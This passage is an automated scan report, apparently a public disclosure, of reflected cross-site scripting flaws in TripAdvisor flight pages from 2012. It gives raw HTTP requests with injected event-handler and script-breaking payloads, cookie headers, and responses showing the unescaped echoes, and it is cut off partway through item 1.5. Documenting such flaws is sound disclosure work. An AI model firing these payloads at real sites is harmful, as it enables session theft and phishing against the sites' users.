XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 01072012-01

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

1.1. http://flights-cdn.tripadvisor.com/en_US/cat/css/650/air,itin,popup,dp,slider,carousel,lightbox-fees.css [REST URL parameter 1] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://flights-cdn.tripadvisor.com
Path:	/en_US/cat/css/650/air,itin,popup,dp,slider,carousel,lightbox-fees.css

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dded3<img%20src%3da%20onerror%3dalert(1)>66c05b3eab5 was submitted in the REST URL parameter 1. This input was echoed as dded3<img src=a onerror=alert(1)>66c05b3eab5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en_USdded3<img%20src%3da%20onerror%3dalert(1)>66c05b3eab5/cat/css/650/air,itin,popup,dp,slider,carousel,lightbox-fees.css HTTP/1.1
Host: flights-cdn.tripadvisor.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://flights.tripadvisor.com/en_US?geo=60878&ipGeo=191&ipCountry=US&travelers=1&cos=0&tab=default&itin=0&nonstop=no&airport0=IAD&airport1=SEA&date0=20120120&date1=20120122&time0=anytime&time1=anytime&nearby0=false&nearby1=false&m=&mInUrl=yes&slice=av_exp1_1&cms=Traffic+Acquisitions_STM-BBD_TAQ_F_PL229_14264
Cookie: v1st=C2AF5DE4B4E3FCC7; TATravelInfo=V2*AC.IAD*AY.2012*AM.1*AD.20*DY.2012*DM.1*DD.22*A.2*MG.-1*HP.2*FL.3; TAUnique=%1%enc%3AK%2F4Byo5ZQ5RXyPkqicornuihoT3IGzN0nzlMIRYiXLo%3D; CM=%1%CCPers%2C%2C-1%7CFtrSess%2C1%2C-1%7CRCPers%2C%2C-1%7CFtrPers%2C%2C-1%7CPU_quick2%2C-1%2C-1%7Cvr_npu2%2C%2C-1%7CPU_quick1%2C1%2C1326031460%7Cvr_npu1%2C%2C-1%7CRCSess%2C%2C-1%7CWShadeSeen%2C%2C-1%7CCCSess%2C%2C-1%7CLastPopunderId%2C53-286-null%2C-1%7Cpu_vr2%2C%2C-1%7Cpu_vr1%2C%2C-1%7C; TASession=%1%V2ID.3D940A37DF0563CED6DA85BACBE54CA6*SQ.1*MC.14264*LS.CheapFlights*GR.88*TCPAR.44*TBR.66*EXEX.62*ABTR.3*PPRP.36*PHTB.47*FS.92*CPU.10*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*CU.USD*FA.1*TFT.3*DF.0*FP.%2FCheapFlights%3Fairport1%3DSEA%26airport0%3DIAD%26travelers%3D1%26cos%3D%26time1%3Danytime%26time0%3Danytime%26nearby1%3Dno%26nearby0%3Dno%26date1%3D20120122%26date0%3D20120120%26nonstop%3Dno%26m%3D14264*RP.http%3A%2F%2Fwww%5C.bookingbuddy%5C.com%2Fr%2F%3Fad_user_tracking%3D%255Bsource%253D%252Ctaparam%253D%252Csupmt%253D%255D%3Fsearch_mode%3Dair%3Fclick_type%3Dv%3Fbbs_2242%3D1%3Fdeparture_city%3DWashington%252C%2BD%5C.C%5C.%2B%2528IAD%2529%3Fdeparture_date%3D1%252F20%252F2012%3Farrival_city%3DSeattle%252C%2BWA%2B%2528SEA%2529%3Freturn_date%3D1%252F22*LR.http%3A%2F%2Fwww%5C.bookingbuddy%5C.com%2Fr%2F%3Fad_user_tracking%3D%255Bsource%253D%252Ctaparam%253D%252Csupmt%253D%255D%3Fsearch_mode%3Dair%3Fclick_type%3Dv%3Fbbs_2242%3D1%3Fdeparture_city%3DWashington%252C%2BD%5C.C%5C.%2B%2528IAD%2529%3Fdeparture_date%3D1%252F20%252F2012%3Farrival_city%3DSeattle%252C%2BWA%2B%2528SEA%2529%3Freturn_date%3D1%252F22*LP.%2FCheapFlights%3Fairport1%3DSEA%26airport0%3DIAD%26travelers%3D1%26cos%3D%26time1%3Danytime%26time0%3Danytime%26nearby1%3Dno%26nearby0%3Dno%26date1%3D20120122%26date0%3D20120120%26nonstop%3Dno%26m%3D14264*BOOM.1000000000010000000001000000000*TRA.true*LD.60878; ServerPool=B; BEPIN=%1%134b87bfcc3%3Brev05a%3A8754%3B
Content-Length: 10

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.3.8
Pragma: public
ETag: "650"
Last-Modified: Sat, 07 Jan 2012 14:04:35 GMT
Vary: Accept-Encoding
Content-Type: text/css;charset=UTF-8
Content-Length: 183798
Cache-Control: public, max-age=2419200
Expires: Sat, 04 Feb 2012 14:04:36 GMT
Date: Sat, 07 Jan 2012 14:04:36 GMT
Connection: close

@charset "UTF-8";
body{background-color:#fff;font:11px/1.636363 Arial,Helvetica,sans-serif;}body,div,table,td,th,img,ul,li,p,h1,h2,h3,h4,fieldset,form,label,legend{margin:0;padding:0;border:none;borde
...[SNIP]...
ight;}input[type=checkbox]{padding:0;}#TAwrapper{background-color:#fff;margin:0 auto;width:955px;}.ipad #TAwrapper{width:770px;}#wrapper{background:#d0dfb4 url("http://flights-cdn.tripadvisor.com/en_USdded3<img src=a onerror=alert(1)>66c05b3eab5/img/641/bg-col-fff.gif") top right repeat-y;}.ipad #wrapper{background-image:none;}#inner-wrap{width:100%;overflow:hidden;padding-bottom:8px;}.no-padding{padding:0;}.summary{display:none;}#mainCol{flo
...[SNIP]...

1.2. http://flights.tripadvisor.com/en_US [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://flights.tripadvisor.com
Path:	/en_US

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f97e'%3b38730b87fa was submitted in the REST URL parameter 1. This input was echoed as 2f97e';38730b87fa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /en_US2f97e'%3b38730b87fa?geo=60878&ipGeo=191&ipCountry=US&travelers=1&cos=0&tab=default&itin=0&nonstop=no&airport0=IAD&airport1=SEA&date0=20120120&date1=20120122&time0=anytime&time1=anytime&nearby0=false&nearby1=false&m=&mInUrl=yes&slice=av_exp1_1&cms=Traffic+Acquisitions_STM-BBD_TAQ_F_PL229_14264 HTTP/1.1
Host: flights.tripadvisor.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tripadvisor.com/CheapFlights?airport0=IAD&airport1=SEA&cos=&date0=20120120&date1=20120122&m=14264&nearby0=no&nearby1=no&nonstop=no&time0=anytime&time1=anytime&travelers=1
Cookie: v1st=C2AF5DE4B4E3FCC7; TATravelInfo=V2*AC.IAD*AY.2012*AM.1*AD.20*DY.2012*DM.1*DD.22*A.2*MG.-1*HP.2*FL.3; TAUnique=%1%enc%3AK%2F4Byo5ZQ5RXyPkqicornuihoT3IGzN0nzlMIRYiXLo%3D; CM=%1%CCPers%2C%2C-1%7CFtrSess%2C1%2C-1%7CRCPers%2C%2C-1%7CFtrPers%2C%2C-1%7CPU_quick2%2C-1%2C-1%7Cvr_npu2%2C%2C-1%7CPU_quick1%2C1%2C1326031460%7Cvr_npu1%2C%2C-1%7CRCSess%2C%2C-1%7CWShadeSeen%2C%2C-1%7CCCSess%2C%2C-1%7CLastPopunderId%2C53-286-null%2C-1%7Cpu_vr2%2C%2C-1%7Cpu_vr1%2C%2C-1%7C; TASession=%1%V2ID.3D940A37DF0563CED6DA85BACBE54CA6*SQ.1*MC.14264*LS.CheapFlights*GR.88*TCPAR.44*TBR.66*EXEX.62*ABTR.3*PPRP.36*PHTB.47*FS.92*CPU.10*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*CU.USD*FA.1*TFT.3*DF.0*FP.%2FCheapFlights%3Fairport1%3DSEA%26airport0%3DIAD%26travelers%3D1%26cos%3D%26time1%3Danytime%26time0%3Danytime%26nearby1%3Dno%26nearby0%3Dno%26date1%3D20120122%26date0%3D20120120%26nonstop%3Dno%26m%3D14264*RP.http%3A%2F%2Fwww%5C.bookingbuddy%5C.com%2Fr%2F%3Fad_user_tracking%3D%255Bsource%253D%252Ctaparam%253D%252Csupmt%253D%255D%3Fsearch_mode%3Dair%3Fclick_type%3Dv%3Fbbs_2242%3D1%3Fdeparture_city%3DWashington%252C%2BD%5C.C%5C.%2B%2528IAD%2529%3Fdeparture_date%3D1%252F20%252F2012%3Farrival_city%3DSeattle%252C%2BWA%2B%2528SEA%2529%3Freturn_date%3D1%252F22*LR.http%3A%2F%2Fwww%5C.bookingbuddy%5C.com%2Fr%2F%3Fad_user_tracking%3D%255Bsource%253D%252Ctaparam%253D%252Csupmt%253D%255D%3Fsearch_mode%3Dair%3Fclick_type%3Dv%3Fbbs_2242%3D1%3Fdeparture_city%3DWashington%252C%2BD%5C.C%5C.%2B%2528IAD%2529%3Fdeparture_date%3D1%252F20%252F2012%3Farrival_city%3DSeattle%252C%2BWA%2B%2528SEA%2529%3Freturn_date%3D1%252F22*LP.%2FCheapFlights%3Fairport1%3DSEA%26airport0%3DIAD%26travelers%3D1%26cos%3D%26time1%3Danytime%26time0%3Danytime%26nearby1%3Dno%26nearby0%3Dno%26date1%3D20120122%26date0%3D20120120%26nonstop%3Dno%26m%3D14264*BOOM.1000000000010000000001000000000*TRA.true*LD.60878; ServerPool=B; BEPIN=%1%134b87bfcc3%3Brev05a%3A8754%3B
Content-Length: 10

Response

HTTP/1.1 200 OK
Date: Sat, 07 Jan 2012 14:07:24 GMT
Server: Apache
X-Powered-By: PHP/5.3.8
Set-Cookie: PHPSESSID=h80lr2jasv8as7no9co6145r16; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: didsearch=1
Set-Cookie: preferences=%3B%3B0%3B1%3Bround%3BIAD%7CSEA%7C20120120%7Cfalse%7Cfalse%7Canytime%3ASEA%7CIAD%7C20120122%7Cfalse%7Cfalse%7Canytime%3B%3B%3B%3B%3B%3B%3B%3B; expires=Fri, 07-Jan-2022 00:15:04 GMT; path=/
Set-Cookie: rsearch=IAD%3ASEA%7C20120120%3A20120122%7Canytime%3Aanytime%7C%7C1%7C0%7Cno%7Cfalse%3Afalse%3B; expires=Sat, 28-Jan-2012 14:07:24 GMT
Connection: close
Content-Length: 34692
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
lcomeBack":true,"codeshares":true,"logCodeshareStats":true,"afsCenterColumnPlacement":true,"wifiAvailability":true,"feesEstimator":true};
var TA_HOST = 'http://www.tripadvisor.com';
var LOCALE = 'en_US2f97e';38730b87fa';
var INVENTORY = 'en_US';
var INVENTORY_COUNTRY = 'US';
var TRIPADVISOR_READONLY = false;
var TYPEAHEAD_URL = 'http://www.tripadvisor.com/TypeAheadJson?action=AIRPORT&callback=?&query=';
var L_LEVEL
...[SNIP]...

1.3. http://flights.tripadvisor.com/en_US [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://flights.tripadvisor.com
Path:	/en_US

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb900"><img%20src%3da%20onerror%3dalert(1)>c84391c79f5 was submitted in the REST URL parameter 1. This input was echoed as eb900"><img src=a onerror=alert(1)>c84391c79f5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en_USeb900"><img%20src%3da%20onerror%3dalert(1)>c84391c79f5?geo=60878&ipGeo=191&ipCountry=US&travelers=1&cos=0&tab=default&itin=0&nonstop=no&airport0=IAD&airport1=SEA&date0=20120120&date1=20120122&time0=anytime&time1=anytime&nearby0=false&nearby1=false&m=&mInUrl=yes&slice=av_exp1_1&cms=Traffic+Acquisitions_STM-BBD_TAQ_F_PL229_14264 HTTP/1.1
Host: flights.tripadvisor.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tripadvisor.com/CheapFlights?airport0=IAD&airport1=SEA&cos=&date0=20120120&date1=20120122&m=14264&nearby0=no&nearby1=no&nonstop=no&time0=anytime&time1=anytime&travelers=1
Cookie: v1st=C2AF5DE4B4E3FCC7; TATravelInfo=V2*AC.IAD*AY.2012*AM.1*AD.20*DY.2012*DM.1*DD.22*A.2*MG.-1*HP.2*FL.3; TAUnique=%1%enc%3AK%2F4Byo5ZQ5RXyPkqicornuihoT3IGzN0nzlMIRYiXLo%3D; CM=%1%CCPers%2C%2C-1%7CFtrSess%2C1%2C-1%7CRCPers%2C%2C-1%7CFtrPers%2C%2C-1%7CPU_quick2%2C-1%2C-1%7Cvr_npu2%2C%2C-1%7CPU_quick1%2C1%2C1326031460%7Cvr_npu1%2C%2C-1%7CRCSess%2C%2C-1%7CWShadeSeen%2C%2C-1%7CCCSess%2C%2C-1%7CLastPopunderId%2C53-286-null%2C-1%7Cpu_vr2%2C%2C-1%7Cpu_vr1%2C%2C-1%7C; TASession=%1%V2ID.3D940A37DF0563CED6DA85BACBE54CA6*SQ.1*MC.14264*LS.CheapFlights*GR.88*TCPAR.44*TBR.66*EXEX.62*ABTR.3*PPRP.36*PHTB.47*FS.92*CPU.10*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*CU.USD*FA.1*TFT.3*DF.0*FP.%2FCheapFlights%3Fairport1%3DSEA%26airport0%3DIAD%26travelers%3D1%26cos%3D%26time1%3Danytime%26time0%3Danytime%26nearby1%3Dno%26nearby0%3Dno%26date1%3D20120122%26date0%3D20120120%26nonstop%3Dno%26m%3D14264*RP.http%3A%2F%2Fwww%5C.bookingbuddy%5C.com%2Fr%2F%3Fad_user_tracking%3D%255Bsource%253D%252Ctaparam%253D%252Csupmt%253D%255D%3Fsearch_mode%3Dair%3Fclick_type%3Dv%3Fbbs_2242%3D1%3Fdeparture_city%3DWashington%252C%2BD%5C.C%5C.%2B%2528IAD%2529%3Fdeparture_date%3D1%252F20%252F2012%3Farrival_city%3DSeattle%252C%2BWA%2B%2528SEA%2529%3Freturn_date%3D1%252F22*LR.http%3A%2F%2Fwww%5C.bookingbuddy%5C.com%2Fr%2F%3Fad_user_tracking%3D%255Bsource%253D%252Ctaparam%253D%252Csupmt%253D%255D%3Fsearch_mode%3Dair%3Fclick_type%3Dv%3Fbbs_2242%3D1%3Fdeparture_city%3DWashington%252C%2BD%5C.C%5C.%2B%2528IAD%2529%3Fdeparture_date%3D1%252F20%252F2012%3Farrival_city%3DSeattle%252C%2BWA%2B%2528SEA%2529%3Freturn_date%3D1%252F22*LP.%2FCheapFlights%3Fairport1%3DSEA%26airport0%3DIAD%26travelers%3D1%26cos%3D%26time1%3Danytime%26time0%3Danytime%26nearby1%3Dno%26nearby0%3Dno%26date1%3D20120122%26date0%3D20120120%26nonstop%3Dno%26m%3D14264*BOOM.1000000000010000000001000000000*TRA.true*LD.60878; ServerPool=B; BEPIN=%1%134b87bfcc3%3Brev05a%3A8754%3B
Content-Length: 10

Response

HTTP/1.1 200 OK
Date: Sat, 07 Jan 2012 14:07:19 GMT
Server: Apache
X-Powered-By: PHP/5.3.8
Set-Cookie: PHPSESSID=720v39e0bd7tson329m0g7spb6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: didsearch=1
Set-Cookie: preferences=%3B%3B0%3B1%3Bround%3BIAD%7CSEA%7C20120120%7Cfalse%7Cfalse%7Canytime%3ASEA%7CIAD%7C20120122%7Cfalse%7Cfalse%7Canytime%3B%3B%3B%3B%3B%3B%3B%3B; expires=Fri, 07-Jan-2022 00:14:59 GMT; path=/
Set-Cookie: rsearch=IAD%3ASEA%7C20120120%3A20120122%7Canytime%3Aanytime%7C%7C1%7C0%7Cno%7Cfalse%3Afalse%3B; expires=Sat, 28-Jan-2012 14:07:19 GMT
Connection: close
Content-Length: 35011
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script src="http://flights-cdn.tripadvisor.com/en_USeb900"><img src=a onerror=alert(1)>c84391c79f5/cat/js/671/dm,j,t,f+d,f+pr,f+l,f+co,locale,flt+result_condenser,flt+bubble,f+ca,flt+carrier_ratings,f+a,f+fe,f+e,f+fll,f+fl,f+i,f+cu,f+pl,f+t,f+rb,f+fg,f+pa,f+s,f+il,f+id,f+fi,f+chf,f+chfd,f+inf,flt+d
...[SNIP]...

1.4. http://flights.tripadvisor.com/en_US [cms parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://flights.tripadvisor.com
Path:	/en_US

Issue detail

The value of the cms request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2324e'%3balert(1)//04d51ddb831 was submitted in the cms parameter. This input was echoed as 2324e';alert(1)//04d51ddb831 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /en_US?geo=60878&ipGeo=191&ipCountry=US&travelers=1&cos=0&tab=default&itin=0&nonstop=no&airport0=IAD&airport1=SEA&date0=20120120&date1=20120122&time0=anytime&time1=anytime&nearby0=false&nearby1=false&m=&mInUrl=yes&slice=av_exp1_1&cms=Traffic+Acquisitions_STM-BBD_TAQ_F_PL229_142642324e'%3balert(1)//04d51ddb831 HTTP/1.1
Host: flights.tripadvisor.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tripadvisor.com/CheapFlights?airport0=IAD&airport1=SEA&cos=&date0=20120120&date1=20120122&m=14264&nearby0=no&nearby1=no&nonstop=no&time0=anytime&time1=anytime&travelers=1
Cookie: v1st=C2AF5DE4B4E3FCC7; TATravelInfo=V2*AC.IAD*AY.2012*AM.1*AD.20*DY.2012*DM.1*DD.22*A.2*MG.-1*HP.2*FL.3; TAUnique=%1%enc%3AK%2F4Byo5ZQ5RXyPkqicornuihoT3IGzN0nzlMIRYiXLo%3D; CM=%1%CCPers%2C%2C-1%7CFtrSess%2C1%2C-1%7CRCPers%2C%2C-1%7CFtrPers%2C%2C-1%7CPU_quick2%2C-1%2C-1%7Cvr_npu2%2C%2C-1%7CPU_quick1%2C1%2C1326031460%7Cvr_npu1%2C%2C-1%7CRCSess%2C%2C-1%7CWShadeSeen%2C%2C-1%7CCCSess%2C%2C-1%7CLastPopunderId%2C53-286-null%2C-1%7Cpu_vr2%2C%2C-1%7Cpu_vr1%2C%2C-1%7C; TASession=%1%V2ID.3D940A37DF0563CED6DA85BACBE54CA6*SQ.1*MC.14264*LS.CheapFlights*GR.88*TCPAR.44*TBR.66*EXEX.62*ABTR.3*PPRP.36*PHTB.47*FS.92*CPU.10*HS.popularity*ES.popularity*AS.popularity*DS.5*SAS.popularity*CU.USD*FA.1*TFT.3*DF.0*FP.%2FCheapFlights%3Fairport1%3DSEA%26airport0%3DIAD%26travelers%3D1%26cos%3D%26time1%3Danytime%26time0%3Danytime%26nearby1%3Dno%26nearby0%3Dno%26date1%3D20120122%26date0%3D20120120%26nonstop%3Dno%26m%3D14264*RP.http%3A%2F%2Fwww%5C.bookingbuddy%5C.com%2Fr%2F%3Fad_user_tracking%3D%255Bsource%253D%252Ctaparam%253D%252Csupmt%253D%255D%3Fsearch_mode%3Dair%3Fclick_type%3Dv%3Fbbs_2242%3D1%3Fdeparture_city%3DWashington%252C%2BD%5C.C%5C.%2B%2528IAD%2529%3Fdeparture_date%3D1%252F20%252F2012%3Farrival_city%3DSeattle%252C%2BWA%2B%2528SEA%2529%3Freturn_date%3D1%252F22*LR.http%3A%2F%2Fwww%5C.bookingbuddy%5C.com%2Fr%2F%3Fad_user_tracking%3D%255Bsource%253D%252Ctaparam%253D%252Csupmt%253D%255D%3Fsearch_mode%3Dair%3Fclick_type%3Dv%3Fbbs_2242%3D1%3Fdeparture_city%3DWashington%252C%2BD%5C.C%5C.%2B%2528IAD%2529%3Fdeparture_date%3D1%252F20%252F2012%3Farrival_city%3DSeattle%252C%2BWA%2B%2528SEA%2529%3Freturn_date%3D1%252F22*LP.%2FCheapFlights%3Fairport1%3DSEA%26airport0%3DIAD%26travelers%3D1%26cos%3D%26time1%3Danytime%26time0%3Danytime%26nearby1%3Dno%26nearby0%3Dno%26date1%3D20120122%26date0%3D20120120%26nonstop%3Dno%26m%3D14264*BOOM.1000000000010000000001000000000*TRA.true*LD.60878; ServerPool=B; BEPIN=%1%134b87bfcc3%3Brev05a%3A8754%3B
Content-Length: 10

Response

HTTP/1.1 200 OK
Date: Sat, 07 Jan 2012 14:06:46 GMT
Server: Apache
X-Powered-By: PHP/5.3.8
Set-Cookie: PHPSESSID=q6hgcjomgc3htpfvsja41cb002; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: didsearch=1
Set-Cookie: preferences=%3B%3B0%3B1%3Bround%3BIAD%7CSEA%7C20120120%7Cfalse%7Cfalse%7Canytime%3ASEA%7CIAD%7C20120122%7Cfalse%7Cfalse%7Canytime%3B%3B%3B%3B%3B%3B%3B%3B; expires=Fri, 07-Jan-2022 00:14:26 GMT; path=/
Set-Cookie: rsearch=IAD%3ASEA%7C20120120%3A20120122%7Canytime%3Aanytime%7C%7C1%7C0%7Cno%7Cfalse%3Afalse%3B; expires=Sat, 28-Jan-2012 14:06:46 GMT
Connection: close
Content-Length: 31316
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
_TIMEOUT = 1800;
var AIRWATCH_ENABLED = true;
var send_heartbeat = false;
var PENALTY_BOX_LIMIT = 3;
var FARE_CAL_TIME_WINDOW = 48;
var COMMERCE_SOURCE = 'Traffic Acquisitions_STM-BBD_TAQ_F_PL229_142642324e';alert(1)//04d51ddb831';
var VALUE_WEIGHTS = {"SHOW_WEIGHTS":false,"DOMESTIC":{"stopPenalty":10,"departureTimePenalty":30,"arrivalTimePenalty":30,"durationPenalty":0.8,"bagPenalty":25,"layoverPenalty":20,"shortLayoverPenalt
...[SNIP]...

1.5. http://flights.tripadvisor.com/en_US [slice parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://flights.tripadvisor.com
Path:	/en_US

Issue detail

The value of the slice request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eed47'%3balert(1)//8433e4e347a was submitted in the slice parameter. This input was echoed as eed47';alert(1)//8433e4e347a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /en_US?geo=60878&ipGeo=191&ipCountry=US&travelers=1&cos=0&tab=default&itin=0&nonstop=no&airport0=IAD&airport1=SEA&date0=20120120&date1=20120122&time0=anytime&time1=anytime&nearby0=false&nearby1=false&m=&mInUrl=yes&slice=av_exp1_1eed47'%3balert(1)//8433e4e347a&cms=Traffic+Acquisitions_STM-BBD_TAQ_F_PL229_14264 HTTP/1.1
Host: flights.tripadvisor.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tripadvisor.com/CheapFlights?airport0=IAD&airport1=SEA&cos=&date0=20120120&date1=20120122&m=14264&nearby0=no&nearby1=no&nonstop=no&time0=anytime&time1=anytime&travelers=1
Cookie: v1st=C2AF5DE4B4E3FCC7; TATravelInfo=V2*AC.IAD*AY.2012*AM.1*AD.20*DY.2012*DM.1*DD.22*A.2*MG.-1*HP.2*FL.3; TAUnique=%1%enc%3AK%2F4Byo5ZQ5RXyPkqicornuihoT3IGzN0nzlMIRYiXLo%3D; CM=%1%CCPers%2C%2C-1%7CFtrSess%2C1%2C-1%7CRCPers%2C%2C-1%7CFtrPers%2C%2C-1%7CPU_quick2%2C-1%2C-1%7Cvr_npu2%2C%2C-1%7CPU_quick1%2C1%2C1326031460%7Cvr_npu1%2C%2C-1%7CRCSess%2C%2C-1%7CWShadeSeen%2C%2C-1%7CCCSess%2C%2C-1%7CLastPopunderId%2C53-286-null%2C-1%7Cpu_vr2%2C%2C-1%7Cpu_vr1%2C%2C-1%7C; 